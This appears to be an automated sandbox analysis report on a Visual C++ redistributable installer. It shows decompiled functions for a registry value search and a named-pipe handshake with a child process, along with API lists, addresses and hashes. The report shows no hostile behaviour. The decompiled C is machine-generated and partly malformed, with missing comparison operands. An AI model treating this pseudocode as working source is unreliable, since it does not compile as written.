                                                                            • Part of subcall function 000B1209: GetLastError.KERNEL32(?,?,?,000B5137,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 000B1251
                                                                          • CoInitializeEx.OLE32(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 000B517D
                                                                            • Part of subcall function 000F0CD1: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 000F0CF2
                                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 000B520F
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 000B5219
                                                                          • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000B549B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                          • String ID: 3.10.4.4718$@Met$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize user state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$Setup$_Failed$user.cpp$txt
                                                                          • API String ID: 3262001429-1227006524
                                                                          • Opcode ID: 327bee585929c58ac32877c1599000ad13a3b2dd249660a4ef555255cebbf002
                                                                          • Instruction ID: e47c85cb182d8fbb915d0850d70bad195eca4c3fd72bbf0af198f811b1e4095f
                                                                          • Opcode Fuzzy Hash: 327bee585929c58ac32877c1599000ad13a3b2dd249660a4ef555255cebbf002
                                                                          • Instruction Fuzzy Hash: 85B1A571D41A2D9BDB32AB64CC46BFD76A8AF04702F0400D5FA09B6642DB719F809F91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000BA311 Relevance: 45.8, APIs: 8, Strings: 18, Instructions: 299registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 624 ba311-ba35f call b71cf 627 ba36b-ba36e 624->627 628 ba361-ba366 624->628 630 ba391-ba3ab call f0e3f 627->630 631 ba370-ba385 call b71cf 627->631 629 ba62e-ba638 call f012f 628->629 638 ba63a-ba64a call f061a 629->638 639 ba64d-ba661 call b2793 * 2 629->639 641 ba3ad-ba3bc call f061a 630->641 642 ba3e5-ba3e7 630->642 631->630 640 ba387-ba38c 631->640 638->639 665 ba663-ba66c RegCloseKey 639->665 666 ba670-ba672 639->666 640->629 657 ba3bf-ba3d2 call b8137 641->657 643 ba3e9-ba3ee 642->643 644 ba3f3-ba410 RegQueryValueExW 642->644 643->629 648 ba428-ba42a 644->648 649 ba412-ba426 call f061a 644->649 654 ba45e-ba470 call b38d4 648->654 655 ba42c-ba459 call b37d3 648->655 649->657 668 ba499-ba4ae RegQueryValueExW 654->668 669 ba472-ba494 call b37d3 call f012f 654->669 655->629 672 ba3de-ba3e0 657->672 673 ba3d4-ba3d9 657->673 665->666 670 ba67a-ba68b call d0499 666->670 671 ba674-ba675 call b3999 666->671 676 ba4e2-ba4e8 668->676 677 ba4b0-ba4dd call b37d3 668->677 669->638 671->670 672->639 673->629 682 ba4ee-ba4f1 676->682 683 ba5e2-ba5e9 call d02f4 676->683 677->629 687 ba549-ba54d 682->687 688 ba4f3-ba4f7 682->688 690 ba5ee 683->690 687->683 691 ba553-ba563 call b1ede 687->691 692 ba4f9-ba4fc 688->692 693 ba53c-ba540 688->693 696 ba5f0-ba5f2 690->696 707 ba56f-ba589 ExpandEnvironmentStringsW 691->707 708 ba565-ba56a 691->708 698 ba519-ba51d 692->698 699 ba4fe-ba514 call f012f 692->699 694 ba51f-ba524 693->694 695 ba542-ba547 693->695 694->638 700 ba52e-ba537 call d02b0 695->700 701 ba5fb-ba60b call cfeb7 696->701 702 ba5f4-ba5f9 696->702 698->694 705 ba529-ba52c 698->705 699->638 700->690 715 ba60d-ba612 701->715 716 ba614-ba61e call b8137 701->716 702->629 705->700 707->696 712 ba58b-ba599 call b1ede 707->712 708->629 712->708 720 ba59b-ba5ab ExpandEnvironmentStringsW 712->720 715->629 719 ba623-ba627 716->719 719->639 722 ba629 719->722 720->696 721 ba5ad-ba5e0 call b37d3 720->721 721->629 722->629
                                                                          C-Code - Quality: 67%
                                                                          			E000BA311(long _a4, intOrPtr _a8) {
				int _v8;
				char _v12;
				int _v16;
				int _v20;
				int _v24;
				intOrPtr _v32;
				void _v48;
				void* _t74;
				void* _t76;
				signed short _t79;
				signed short _t85;
				void* _t87;
				void* _t89;
				void* _t93;
				void* _t103;
				long _t106;
				signed short _t110;
				void* _t114;
				WCHAR* _t131;
				signed int _t132;
				long _t143;
				void* _t145;
				void* _t147;
				void* _t148;
				void* _t158;
				void* _t159;

				_t132 = 6;
				memset( &_v48, 0, _t132 << 2);
				_t159 = _t158 + 0xc;
				_t143 = _a4;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t131 = 0;
				_t72 =  ==  ? 1 : 0x101;
				_v24 = 0;
				_a4 =  ==  ? 1 : 0x101;
				_v8 = 0;
				_t74 = E000B71CF(_a8,  *((intOrPtr*)(_t143 + 0x1c)),  &_v12, 0); // executed
				if(_t74 >= 0) {
					if( *((intOrPtr*)(_t143 + 0x20)) == 0) {
						L5:
						_t76 = E000F0E3F( *((intOrPtr*)(_t143 + 0x18)), _v12, _a4,  &_v16); // executed
						_t145 = _t76;
						if(_t145 != 0x80070002) {
							if(_t145 >= 0) {
								_t79 = RegQueryValueExW(_v16, _v20, 0,  &_v24, 0,  &_v8); // executed
								if(_t79 != 2) {
									if(_t79 == 0) {
										_t131 = E000B38D4(_v8 + 2, 1);
										if(_t131 != 0) {
											_t85 = RegQueryValueExW(_v16, _v20, 0,  &_v24, _t131,  &_v8); // executed
											if(_t85 == 0) {
												_t87 = _v24 - 1;
												if(_t87 == 0) {
													L38:
													_t89 = E000D02F4( &_v48, _t131, 0);
													goto L39;
												} else {
													_t103 = _t87 - 1;
													if(_t103 == 0) {
														if( *((intOrPtr*)(_t143 + 0x28)) == 0) {
															goto L38;
														} else {
															_t147 = E000B1EDE( &_v48, _v8);
															if(_t147 >= 0) {
																_v32 = 2;
																_t106 = ExpandEnvironmentStringsW(_t131, _v48, _v8);
																_a4 = _t106;
																if(_t106 <= _v8) {
																	goto L40;
																} else {
																	_t148 = E000B1EDE( &_v48, _t106);
																	if(_t148 < 0) {
																		goto L33;
																	} else {
																		if(_a4 == ExpandEnvironmentStringsW(_t131, _v48, _a4)) {
																			goto L40;
																		} else {
																			_t110 = GetLastError();
																			_t151 =  <=  ? _t110 : _t110 & 0x0000ffff | 0x80070000;
																			_t148 =  >=  ? 0x80004005 :  <=  ? _t110 : _t110 & 0x0000ffff | 0x80070000;
																			E000B37D3(0x80004005, "search.cpp", 0x396, _t148);
																			_push("Failed to get expand environment string.");
																			goto L46;
																		}
																	}
																}
															} else {
																L33:
																_push("Failed to allocate string buffer.");
																goto L46;
															}
														}
													} else {
														_t114 = _t103;
														if(_t114 == 0) {
															if(_v8 != 4) {
																goto L26;
															} else {
																asm("cdq");
																_push(0);
																_push( *_t131);
																goto L28;
															}
														} else {
															if(_t114 == 7) {
																if(_v8 == 8) {
																	_push(_t131[2]);
																	_push( *_t131);
																	L28:
																	_push( &_v48);
																	_t89 = E000D02B0();
																	L39:
																	_t147 = _t89;
																	L40:
																	if(_t147 >= 0) {
																		_t148 = E000CFEB7(0,  &_v48,  *((intOrPtr*)(_t143 + 0x14)));
																		if(_t148 >= 0) {
																			_t93 = E000B8137(_a8,  *((intOrPtr*)(_t143 + 4)),  &_v48); // executed
																			_t148 = _t93;
																			if(_t148 < 0) {
																				_push("Failed to set variable.");
																				goto L46;
																			}
																		} else {
																			_push("Failed to change value type.");
																			goto L46;
																		}
																	} else {
																		_push("Failed to read registry value.");
																		goto L46;
																	}
																} else {
																	L26:
																	_t148 = 0x8000ffff;
																	goto L47;
																}
															} else {
																_t148 = 0x80004001;
																E000F012F(0x80004001, "Unsupported registry key value type. Type = \'%u\'", _v24);
																_t159 = _t159 + 0xc;
																goto L47;
															}
														}
													}
												}
											} else {
												_t154 =  <=  ? _t85 : _t85 & 0x0000ffff | 0x80070000;
												_t148 =  >=  ? 0x80004005 :  <=  ? _t85 : _t85 & 0x0000ffff | 0x80070000;
												E000B37D3(0x80004005, "search.cpp", 0x375, _t148);
												_push("Failed to query registry key value.");
												goto L46;
											}
										} else {
											_t148 = 0x8007000e;
											E000B37D3(_t82, "search.cpp", 0x372, 0x8007000e);
											_push("Failed to allocate memory registry value.");
											_push(0x8007000e);
											E000F012F();
											goto L47;
										}
									} else {
										_t157 =  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
										_t148 =  >=  ? 0x80004005 :  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
										E000B37D3(0x80004005, "search.cpp", 0x36f, _t148);
										_push("Failed to query registry key value size.");
										goto L46;
									}
								} else {
									_push(_v20);
									E000F061A(_t79, "Registry value not found. Key = \'%ls\', Value = \'%ls\'", _v12);
									_t159 = _t159 + 0x10;
									goto L7;
								}
							} else {
								_push("Failed to open registry key.");
								goto L46;
							}
						} else {
							E000F061A(2, "Registry key not found. Key = \'%ls\'", _v12);
							_t159 = _t159 + 0xc;
							L7:
							_t148 = E000B8137(_a8,  *((intOrPtr*)(_t143 + 4)),  &_v48);
							if(_t148 >= 0) {
								_t148 = 0;
							} else {
								_push("Failed to clear variable.");
								goto L46;
							}
						}
					} else {
						_t148 = E000B71CF(_a8,  *((intOrPtr*)(_t143 + 0x20)),  &_v20, 0);
						if(_t148 >= 0) {
							goto L5;
						} else {
							_push("Failed to format value string.");
							goto L46;
						}
					}
				} else {
					_push("Failed to format key string.");
					L46:
					_push(_t148);
					E000F012F();
					if(_t148 < 0) {
						L47:
						_push(_t148);
						E000F061A(2, "RegistrySearchValue failed: ID \'%ls\', HRESULT 0x%x", _v12);
					}
				}
				E000B2793(_v12);
				E000B2793(_v20);
				if(_v16 != 0) {
					RegCloseKey(_v16); // executed
					_v16 = _v16 & 0x00000000;
				}
				if(_t131 != 0) {
					E000B3999(_t131);
				}
				E000D0499( &_v48);
				return _t148;
			}





























                                                                          0x000ba31c
                                                                          0x000ba322
                                                                          0x000ba322
                                                                          0x000ba324
                                                                          0x000ba32b
                                                                          0x000ba32f
                                                                          0x000ba337
                                                                          0x000ba33d
                                                                          0x000ba340
                                                                          0x000ba343
                                                                          0x000ba346
                                                                          0x000ba350
                                                                          0x000ba356
                                                                          0x000ba35f
                                                                          0x000ba36e
                                                                          0x000ba391
                                                                          0x000ba39e
                                                                          0x000ba3a3
                                                                          0x000ba3ab
                                                                          0x000ba3e7
                                                                          0x000ba40b
                                                                          0x000ba410
                                                                          0x000ba42a
                                                                          0x000ba46c
                                                                          0x000ba470
                                                                          0x000ba4aa
                                                                          0x000ba4ae
                                                                          0x000ba4e5
                                                                          0x000ba4e8
                                                                          0x000ba5e2
                                                                          0x000ba5e9
                                                                          0x00000000
                                                                          0x000ba4ee
                                                                          0x000ba4ee
                                                                          0x000ba4f1
                                                                          0x000ba54d
                                                                          0x00000000
                                                                          0x000ba553
                                                                          0x000ba55f
                                                                          0x000ba563
                                                                          0x000ba572
                                                                          0x000ba57d
                                                                          0x000ba583
                                                                          0x000ba589
                                                                          0x00000000
                                                                          0x000ba58b
                                                                          0x000ba595
                                                                          0x000ba599
                                                                          0x00000000
                                                                          0x000ba59b
                                                                          0x000ba5ab
                                                                          0x00000000
                                                                          0x000ba5ad
                                                                          0x000ba5ad
                                                                          0x000ba5be
                                                                          0x000ba5c8
                                                                          0x000ba5d6
                                                                          0x000ba5db
                                                                          0x00000000
                                                                          0x000ba5db
                                                                          0x000ba5ab
                                                                          0x000ba599
                                                                          0x000ba565
                                                                          0x000ba565
                                                                          0x000ba565
                                                                          0x00000000
                                                                          0x000ba565
                                                                          0x000ba563
                                                                          0x000ba4f3
                                                                          0x000ba4f4
                                                                          0x000ba4f7
                                                                          0x000ba540
                                                                          0x00000000
                                                                          0x000ba542
                                                                          0x000ba544
                                                                          0x000ba545
                                                                          0x000ba546
                                                                          0x00000000
                                                                          0x000ba546
                                                                          0x000ba4f9
                                                                          0x000ba4fc
                                                                          0x000ba51d
                                                                          0x000ba529
                                                                          0x000ba52c
                                                                          0x000ba52e
                                                                          0x000ba531
                                                                          0x000ba532
                                                                          0x000ba5ee
                                                                          0x000ba5ee
                                                                          0x000ba5f0
                                                                          0x000ba5f2
                                                                          0x000ba607
                                                                          0x000ba60b
                                                                          0x000ba61e
                                                                          0x000ba623
                                                                          0x000ba627
                                                                          0x000ba629
                                                                          0x00000000
                                                                          0x000ba629
                                                                          0x000ba60d
                                                                          0x000ba60d
                                                                          0x00000000
                                                                          0x000ba60d
                                                                          0x000ba5f4
                                                                          0x000ba5f4
                                                                          0x00000000
                                                                          0x000ba5f4
                                                                          0x000ba51f
                                                                          0x000ba51f
                                                                          0x000ba51f
                                                                          0x00000000
                                                                          0x000ba51f
                                                                          0x000ba4fe
                                                                          0x000ba501
                                                                          0x000ba50c
                                                                          0x000ba511
                                                                          0x00000000
                                                                          0x000ba511
                                                                          0x000ba4fc
                                                                          0x000ba4f7
                                                                          0x000ba4f1
                                                                          0x000ba4b0
                                                                          0x000ba4bb
                                                                          0x000ba4c5
                                                                          0x000ba4d3
                                                                          0x000ba4d8
                                                                          0x00000000
                                                                          0x000ba4d8
                                                                          0x000ba472
                                                                          0x000ba472
                                                                          0x000ba482
                                                                          0x000ba487
                                                                          0x000ba48c
                                                                          0x000ba48d
                                                                          0x00000000
                                                                          0x000ba493
                                                                          0x000ba42c
                                                                          0x000ba437
                                                                          0x000ba441
                                                                          0x000ba44f
                                                                          0x000ba454
                                                                          0x00000000
                                                                          0x000ba454
                                                                          0x000ba412
                                                                          0x000ba412
                                                                          0x000ba41e
                                                                          0x000ba423
                                                                          0x00000000
                                                                          0x000ba423
                                                                          0x000ba3e9
                                                                          0x000ba3e9
                                                                          0x00000000
                                                                          0x000ba3e9
                                                                          0x000ba3ad
                                                                          0x000ba3b7
                                                                          0x000ba3bc
                                                                          0x000ba3bf
                                                                          0x000ba3ce
                                                                          0x000ba3d2
                                                                          0x000ba3de
                                                                          0x000ba3d4
                                                                          0x000ba3d4
                                                                          0x00000000
                                                                          0x000ba3d4
                                                                          0x000ba3d2
                                                                          0x000ba370
                                                                          0x000ba381
                                                                          0x000ba385
                                                                          0x00000000
                                                                          0x000ba387
                                                                          0x000ba387
                                                                          0x00000000
                                                                          0x000ba387
                                                                          0x000ba385
                                                                          0x000ba361
                                                                          0x000ba361
                                                                          0x000ba62e
                                                                          0x000ba62e
                                                                          0x000ba62f
                                                                          0x000ba638
                                                                          0x000ba63a
                                                                          0x000ba63a
                                                                          0x000ba645
                                                                          0x000ba64a
                                                                          0x000ba638
                                                                          0x000ba650
                                                                          0x000ba658
                                                                          0x000ba661
                                                                          0x000ba666
                                                                          0x000ba66c
                                                                          0x000ba66c
                                                                          0x000ba672
                                                                          0x000ba675
                                                                          0x000ba675
                                                                          0x000ba67e
                                                                          0x000ba68b

                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 000BA356
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 000BA37C
                                                                          • RegCloseKey.KERNELBASE(00000000,?,00000000,?,?,?,?,?), ref: 000BA666
                                                                          Strings
                                                                          • Failed to format key string., xrefs: 000BA361
                                                                          • Failed to set variable., xrefs: 000BA629
                                                                          • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 000BA418
                                                                          • Failed to clear variable., xrefs: 000BA3D4
                                                                          • Failed to get expand environment string., xrefs: 000BA5DB
                                                                          • Unsupported registry key value type. Type = '%u', xrefs: 000BA506
                                                                          • Failed to format value string., xrefs: 000BA387
                                                                          • Failed to change value type., xrefs: 000BA60D
                                                                          • search.cpp, xrefs: 000BA44A, 000BA47D, 000BA4CE, 000BA5D1
                                                                          • Failed to query registry key value., xrefs: 000BA4D8
                                                                          • @Met, xrefs: 000BA5AD
                                                                          • Failed to allocate string buffer., xrefs: 000BA565
                                                                          • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 000BA63E
                                                                          • Failed to query registry key value size., xrefs: 000BA454
                                                                          • Failed to open registry key., xrefs: 000BA3E9
                                                                          • Registry key not found. Key = '%ls', xrefs: 000BA3B0
                                                                          • Failed to allocate memory registry value., xrefs: 000BA487
                                                                          • Failed to read registry value., xrefs: 000BA5F4
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Open@16$Close
                                                                          • String ID: @Met$Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
                                                                          • API String ID: 2348241696-68201321
                                                                          • Opcode ID: c9bbfefc37ef59a999227218596157e48d48f2f5166dec1f96eec1951d61d518
                                                                          • Instruction ID: 0a20d774fb148a2af400a0ad3c8a7c39aa05ce555af3452b9972630b389a9656
                                                                          • Opcode Fuzzy Hash: c9bbfefc37ef59a999227218596157e48d48f2f5166dec1f96eec1951d61d518
                                                                          • Instruction Fuzzy Hash: 71A1E7B2E40619BBDF219AA4CC05FFE7BA9AF05710F144121FA04BA551DB71DE10EBA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000C52E3 Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 222filepipesleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 726 c52e3-c5326 lstrlenW GetCurrentProcessId 727 c5329-c5330 726->727 728 c5336-c534e SetNamedPipeHandleState 727->728 729 c55b2-c55ba 727->729 730 c557b-c55a5 GetLastError call b37d3 728->730 731 c5354 728->731 738 c55aa-c55b1 call f012f 730->738 732 c5358-c5363 ConnectNamedPipe 731->732 734 c539c-c53a2 732->734 735 c5365-c536c GetLastError 732->735 734->732 737 c53a4-c53a6 734->737 739 c5457-c5459 735->739 740 c5372-c5377 735->740 741 c53ac-c53c1 SetNamedPipeHandleState 737->741 742 c5463-c5478 call b37d3 737->742 738->729 739->741 744 c537d-c5385 740->744 745 c5444-c5452 740->745 746 c554a-c5579 GetLastError call b37d3 741->746 747 c53c7-c53dc WriteFile 741->747 742->738 750 c545e 744->750 751 c538b-c5396 Sleep 744->751 745->737 746->738 752 c5519-c5548 GetLastError call b37d3 747->752 753 c53e2-c53f7 WriteFile 747->753 750->742 751->734 752->738 756 c53fd-c5412 WriteFile 753->756 757 c54e5-c5514 GetLastError call b37d3 753->757 760 c5418-c542d ReadFile 756->760 761 c54b1-c54e0 GetLastError call b37d3 756->761 757->738 765 c547d-c54ac GetLastError call b37d3 760->765 766 c542f-c5439 760->766 761->738 765->738 766->727 769 c543f 766->769 769->729
                                                                          C-Code - Quality: 81%
                                                                          			E000C52E3(long _a4) {
				long _v8;
				signed int _v12;
				void _v16;
				signed int _v20;
				void* _v24;
				void _v28;
				void _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				WCHAR* _t40;
				long _t43;
				signed int _t44;
				int _t47;
				signed short _t48;
				signed short _t52;
				int _t55;
				signed short _t56;
				signed short _t62;
				signed short _t67;
				signed short _t73;
				int _t78;
				signed short _t79;
				void* _t83;
				long _t84;
				signed int _t88;
				void* _t109;

				_t84 = _a4;
				_t88 = 0;
				_v40 =  *((intOrPtr*)(_t84 + 0x10));
				_v36 =  *((intOrPtr*)(_t84 + 0x14));
				_t40 =  *(_t84 + 4);
				_v24 = _t40;
				_v16 = lstrlenW(_t40) + _t41;
				_t43 = GetCurrentProcessId();
				_v32 = _v32 & 0;
				_a4 = _a4 & 0;
				_v28 = _t43;
				_t44 = 0;
				_v20 = 0;
				while(1) {
					L1:
					_t83 =  *(_t109 + _t44 * 4 - 0x24);
					if(_t83 == 0xffffffff) {
						break;
					}
					_v8 = 1;
					_t47 = SetNamedPipeHandleState(_t83,  &_v8, 0, 0); // executed
					if(_t47 == 0) {
						_t48 = GetLastError();
						_t91 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
						_t88 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
						E000B37D3(0x80004005, "pipe.cpp", 0x1ce, _t88);
						_push("Failed to set pipe to non-blocking.");
						goto L28;
					} else {
						_v12 = _v12 & 0x00000000;
						do {
							_t52 = ConnectNamedPipe(_t83, 0); // executed
							if(_t52 != 0) {
								goto L9;
							} else {
								_t52 = GetLastError();
								if(_t52 == 0x217) {
									_t88 = 0;
									L11:
									_v8 = _v8 & 0x00000000;
									_t55 = SetNamedPipeHandleState(_t83,  &_v8, 0, 0); // executed
									if(_t55 == 0) {
										_t56 = GetLastError();
										_t94 =  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
										_t88 =  >=  ? 0x80004005 :  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
										E000B37D3(0x80004005, "pipe.cpp", 0x1f9, _t88);
										_push("Failed to reset pipe to blocking.");
										goto L28;
									} else {
										if(WriteFile(_t83,  &_v16, 4,  &_a4, 0) == 0) {
											_t62 = GetLastError();
											_t97 =  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
											_t88 =  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
											E000B37D3(0x80004005, "pipe.cpp", 0x1ff, _t88);
											_push("Failed to write secret length to pipe.");
											goto L28;
										} else {
											if(WriteFile(_t83, _v24, _v16,  &_a4, 0) == 0) {
												_t67 = GetLastError();
												_t100 =  <=  ? _t67 : _t67 & 0x0000ffff | 0x80070000;
												_t88 =  >=  ? 0x80004005 :  <=  ? _t67 : _t67 & 0x0000ffff | 0x80070000;
												E000B37D3(0x80004005, "pipe.cpp", 0x204, _t88);
												_push("Failed to write secret to pipe.");
												goto L28;
											} else {
												if(WriteFile(_t83,  &_v28, 4,  &_a4, 0) == 0) {
													_t73 = GetLastError();
													_t103 =  <=  ? _t73 : _t73 & 0x0000ffff | 0x80070000;
													_t88 =  >=  ? 0x80004005 :  <=  ? _t73 : _t73 & 0x0000ffff | 0x80070000;
													E000B37D3(0x80004005, "pipe.cpp", 0x209, _t88);
													_push("Failed to write our process id to pipe.");
													goto L28;
												} else {
													_t78 = ReadFile(_t83,  &_v32, 4,  &_a4, 0); // executed
													if(_t78 == 0) {
														_t79 = GetLastError();
														_t106 =  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
														_t88 =  >=  ? 0x80004005 :  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
														E000B37D3(0x80004005, "pipe.cpp", 0x20f, _t88);
														_push("Failed to read ACK from pipe.");
														goto L28;
													} else {
														_t44 = _v20 + 1;
														_v20 = _t44;
														if(_t44 < 2) {
															goto L1;
														} else {
														}
													}
												}
											}
										}
									}
								} else {
									if(_t52 != 0x218) {
										_t88 =  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
										break;
									} else {
										_t52 = _v12;
										if(_t52 >= 0x708) {
											_t88 = 0x800705b4;
											L21:
											E000B37D3(_t52, "pipe.cpp", 0x1f3, _t88);
											_push("Failed to wait for child to connect to pipe.");
											L28:
											_push(_t88);
											E000F012F();
										} else {
											_t52 = _t52 + 1;
											_t88 = 0x80070218;
											_v12 = _t52;
											Sleep(0x64); // executed
											goto L9;
										}
									}
								}
							}
							goto L29;
							L9:
						} while (_t88 == 0x80070218);
						if(_t88 < 0) {
							goto L21;
						} else {
							goto L11;
						}
					}
					break;
				}
				L29:
				return _t88;
			}





























                                                                          0x000c52e9
                                                                          0x000c52f2
                                                                          0x000c52f4
                                                                          0x000c52fa
                                                                          0x000c52fd
                                                                          0x000c5301
                                                                          0x000c530c
                                                                          0x000c530f
                                                                          0x000c5315
                                                                          0x000c5318
                                                                          0x000c5321
                                                                          0x000c5324
                                                                          0x000c5326
                                                                          0x000c5329
                                                                          0x000c5329
                                                                          0x000c5329
                                                                          0x000c5330
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000c533d
                                                                          0x000c5346
                                                                          0x000c534e
                                                                          0x000c557b
                                                                          0x000c5588
                                                                          0x000c5592
                                                                          0x000c55a0
                                                                          0x000c55a5
                                                                          0x00000000
                                                                          0x000c5354
                                                                          0x000c5354
                                                                          0x000c5358
                                                                          0x000c535b
                                                                          0x000c5363
                                                                          0x00000000
                                                                          0x000c5365
                                                                          0x000c5365
                                                                          0x000c536c
                                                                          0x000c5457
                                                                          0x000c53ac
                                                                          0x000c53ac
                                                                          0x000c53b9
                                                                          0x000c53c1
                                                                          0x000c554a
                                                                          0x000c5557
                                                                          0x000c5561
                                                                          0x000c556f
                                                                          0x000c5574
                                                                          0x00000000
                                                                          0x000c53c7
                                                                          0x000c53dc
                                                                          0x000c5519
                                                                          0x000c5526
                                                                          0x000c5530
                                                                          0x000c553e
                                                                          0x000c5543
                                                                          0x00000000
                                                                          0x000c53e2
                                                                          0x000c53f7
                                                                          0x000c54e5
                                                                          0x000c54f2
                                                                          0x000c54fc
                                                                          0x000c550a
                                                                          0x000c550f
                                                                          0x00000000
                                                                          0x000c53fd
                                                                          0x000c5412
                                                                          0x000c54b1
                                                                          0x000c54be
                                                                          0x000c54c8
                                                                          0x000c54d6
                                                                          0x000c54db
                                                                          0x00000000
                                                                          0x000c5418
                                                                          0x000c5425
                                                                          0x000c542d
                                                                          0x000c547d
                                                                          0x000c548a
                                                                          0x000c5494
                                                                          0x000c54a2
                                                                          0x000c54a7
                                                                          0x00000000
                                                                          0x000c542f
                                                                          0x000c5432
                                                                          0x000c5433
                                                                          0x000c5439
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000c543f
                                                                          0x000c5439
                                                                          0x000c542d
                                                                          0x000c5412
                                                                          0x000c53f7
                                                                          0x000c53dc
                                                                          0x000c5372
                                                                          0x000c5377
                                                                          0x000c544f
                                                                          0x00000000
                                                                          0x000c537d
                                                                          0x000c537d
                                                                          0x000c5385
                                                                          0x000c545e
                                                                          0x000c5463
                                                                          0x000c546e
                                                                          0x000c5473
                                                                          0x000c55aa
                                                                          0x000c55aa
                                                                          0x000c55ab
                                                                          0x000c538b
                                                                          0x000c538b
                                                                          0x000c538c
                                                                          0x000c5393
                                                                          0x000c5396
                                                                          0x00000000
                                                                          0x000c5396
                                                                          0x000c5385
                                                                          0x000c5377
                                                                          0x000c536c
                                                                          0x00000000
                                                                          0x000c539c
                                                                          0x000c539c
                                                                          0x000c53a6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000c53a6
                                                                          0x00000000
                                                                          0x000c534e
                                                                          0x000c55b3
                                                                          0x000c55ba

                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?,?,00000000,?,000FB4F0,?,00000000,?,000B442A,?,000FB4F0), ref: 000C5304
                                                                          • GetCurrentProcessId.KERNEL32(?,000B442A,?,000FB4F0), ref: 000C530F
                                                                          • SetNamedPipeHandleState.KERNELBASE(?,000000FF,00000000,00000000,?,000B442A,?,000FB4F0), ref: 000C5346
                                                                          • ConnectNamedPipe.KERNELBASE(?,00000000,?,000B442A,?,000FB4F0), ref: 000C535B
                                                                          • GetLastError.KERNEL32(?,000B442A,?,000FB4F0), ref: 000C5365
                                                                          • Sleep.KERNELBASE(00000064,?,000B442A,?,000FB4F0), ref: 000C5396
                                                                          • SetNamedPipeHandleState.KERNELBASE(?,00000000,00000000,00000000,?,000B442A,?,000FB4F0), ref: 000C53B9
                                                                          • WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,000B442A,?,000FB4F0), ref: 000C53D4
                                                                          • WriteFile.KERNEL32(?,000B442A,000FB4F0,00000000,00000000,?,000B442A,?,000FB4F0), ref: 000C53EF
